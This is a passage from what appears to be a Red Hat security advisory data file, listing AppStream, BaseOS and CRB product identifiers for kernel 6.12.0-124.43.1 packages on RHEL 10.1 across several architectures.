"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
